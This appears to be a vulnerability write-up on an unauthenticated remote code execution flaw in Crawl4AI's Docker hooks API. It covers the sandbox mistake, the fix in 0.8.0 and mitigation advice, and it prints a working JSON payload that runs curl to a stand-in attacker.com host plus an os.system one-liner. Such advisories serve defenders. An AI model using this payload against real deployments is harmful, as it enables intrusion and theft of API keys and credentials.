Crawl4AI RCE: Hook, Line, and Sinker into Your Docker Container
Jan 17, 2026·5 min read
Executive Summary (TL;DR)
Crawl4AI, a web scraper for LLMs, exposed an unauthenticated API endpoint that accepted custom Python code for 'hooks'. The developers attempted to sandbox this using `exec()` but accidentally allowed `__import__`. Attackers can send a JSON payload to the `/crawl` endpoint to execute system commands as root inside the Docker container, potentially stealing API keys or pivoting within the network. Fixed in version 0.8.0.
A critical Remote Code Execution (RCE) vulnerability in Crawl4AI's Docker deployment allows unauthenticated attackers to execute arbitrary Python code via the `hooks` parameter, bypassing a flimsy sandbox.
The Hook: Scrapers Need Logic, Hackers Need Shells
In the age of Large Language Models, feeding data to the beast is a full-time job. Enter Crawl4AI, a nifty tool designed to crawl the web and return clean, LLM-ready markdown. It's packaged neatly in a Docker container, making it easy for developers to spin up a scraping microservice. To make it flexible, the developers added a feature called Hooks.
Hooks are conceptually great. They allow users to inject custom logic at specific points in the scraping lifecycle—like when a page context is created (on_page_context_created). You might want to strip specific DOM elements or modify headers before the crawler does its job.
But here is the problem: providing "custom logic" usually means providing code. And when you allow unauthenticated users to send code to your server via a public API, you aren't just building a feature; you are building a remote shell with extra steps. The Crawl4AI Docker API exposed a /crawl endpoint that took this code and ran it. What could possibly go wrong?
The Flaw: The 'Sandbox' That Wasn't
The road to RCE is paved with good intentions and the Python exec() function. The developers knew that running user code was dangerous, so they tried to implement a sandbox. In Python, exec() accepts optional arguments to define the global and local scope, effectively limiting what the executed code can see.
The implementation attempted to restrict access by defining a whitelist of allowed_builtins. The idea was simple: if we only give them access to safe functions, they can't hurt us.
However, they made a fatal error in their whitelist. They included __import__.
[!ALERT] Security Rule #1 of Python: If you give an attacker access to
__import__, you have given them the kingdom.
With __import__ available, the restrictions on other built-ins became irrelevant. An attacker doesn't need a pre-imported os module if they can just import it themselves dynamically. This is the equivalent of locking your front door (restricting scope) but leaving the window wide open with a neon sign pointing to it.
The Code: Anatomy of a Bypass
Let's look at the logic that doomed the container. The vulnerable code in the hook manager looked something like this:
# The flawed logic (Simplified)
allowed_builtins = {
'print': print,
'__import__': __import__, # <--- The Fatal Mistake
# ... other safe functions
}
def execute_hook(code_string):
# Executing user input with a "limited" scope
exec(code_string, {'__builtins__': allowed_builtins})Because __import__ was explicitly passed into the scope, the attacker could simply write:
__import__('os').system('id')The fix in version 0.8.0 was twofold. First, they removed the dangerous builtin. Second, and more importantly, they realized that secure defaults matter. They disabled hooks entirely by default.
# The Fix in v0.8.0
# 1. Hooks are disabled by default
if not os.getenv("CRAWL4AI_HOOKS_ENABLED"):
raise SecurityError("Hooks are disabled.")
# 2. Hardened scope (simplified)
allowed_builtins = {
'print': print,
# '__import__' is GONE.
}The Exploit: JSON-Based Remote Code Execution
Exploiting this is trivially easy. You don't need complex memory corruption or race conditions. You just need a JSON payload and curl.
The attacker targets the /crawl endpoint. They construct a JSON body that defines a hook. Inside that hook, they place valid Python code. Since the server runs this code blindly, we can invoke the OS module to execute shell commands.
Here is a weaponized payload that forces the server to reach out to an attacker-controlled listener:
POST /crawl HTTP/1.1
Host: target-crawl4ai:8000
Content-Type: application/json
{
"urls": ["https://example.com"],
"hooks": {
"code": {
"on_page_context_created": "async def hook(page, context, **kwargs):\n # The Money Shot\n import os\n os.system('curl http://attacker.com/$(whoami)')\n return page"
}
}
}Wait, didn't we say __import__?
In many Python exec contexts, if __import__ is allowed, the import statement works too because it desugars to the builtin. Even if the keyword import was blocked by a regex (it wasn't here), the attacker could use __import__('os').system(...) directly.
Once sent, the Docker container executes the command as the running user. Since this is often root inside the container (unless specifically hardened), the attacker has full control over the environment.
The Impact: Secrets, Spiders, and Pivots
Why is this a CVSS 10.0?
- Complexity: Low: A script kiddie can write this exploit in 30 seconds.
- Privileges: None: No authentication required.
- Impact: Critical: Total compromise.
While the exploit runs inside a Docker container, that is rarely the end of the story. Crawl4AI is designed for LLM workflows, which means the environment variables likely contain:
- OpenAI / Anthropic API Keys: These are cash equivalents. Attackers steal them to resell access.
- Database Credentials: If the scraper saves data to a Postgres or Mongo instance, those credentials are now compromised.
- Internal Network Access: The container sits inside your network. An attacker can install
nmap(or just use Python) to scan your internal VPC, pivoting from a lowly web scraper to your core infrastructure.
This isn't just a bug; it's a free backstage pass to your infrastructure.
The Fix: Kill the Feature, Save the App
The mitigation is straightforward: Update to v0.8.0 immediately.
The maintainers correctly identified that "sandboxing is hard" and shifted the responsibility to the user.
- Default Deny: The Docker API now blocks hooks unless you explicitly set the environment variable
CRAWL4AI_HOOKS_ENABLED=true. - Scope Reduction: Even if enabled, the execution scope no longer includes
__import__.
If you cannot update immediately, you must put this service behind a firewall or an authentication gateway (like Basic Auth via Nginx). Never expose the default Crawl4AI Docker port (usually 8000) to the public internet without an auth layer in front of it.
Official Patches
Technical Appendix
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:HAffected Systems
Affected Versions Detail
| Product | Affected Versions | Fixed Version |
|---|---|---|
Crawl4AI Crawl4AI (Open Source) | < 0.8.0 | 0.8.0 |
| Attribute | Detail |
|---|---|
| Vulnerability Type | Remote Code Execution (RCE) |
| CWE ID | CWE-95 (Improper Neutralization of Directives in Dynamically Evaluated Code) |
| CVSS Score | 10.0 (Critical) |
| Attack Vector | Network (API) |
| Authentication | None |
| Affected Component | Docker API / Hook Manager |
MITRE ATT&CK Mapping
The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes code syntax before using the input in a dynamic evaluation call (e.g. 'eval').
Known Exploits & Detection
Vulnerability Timeline
Subscribe to updates
Get the latest CVE analysis reports delivered to your inbox.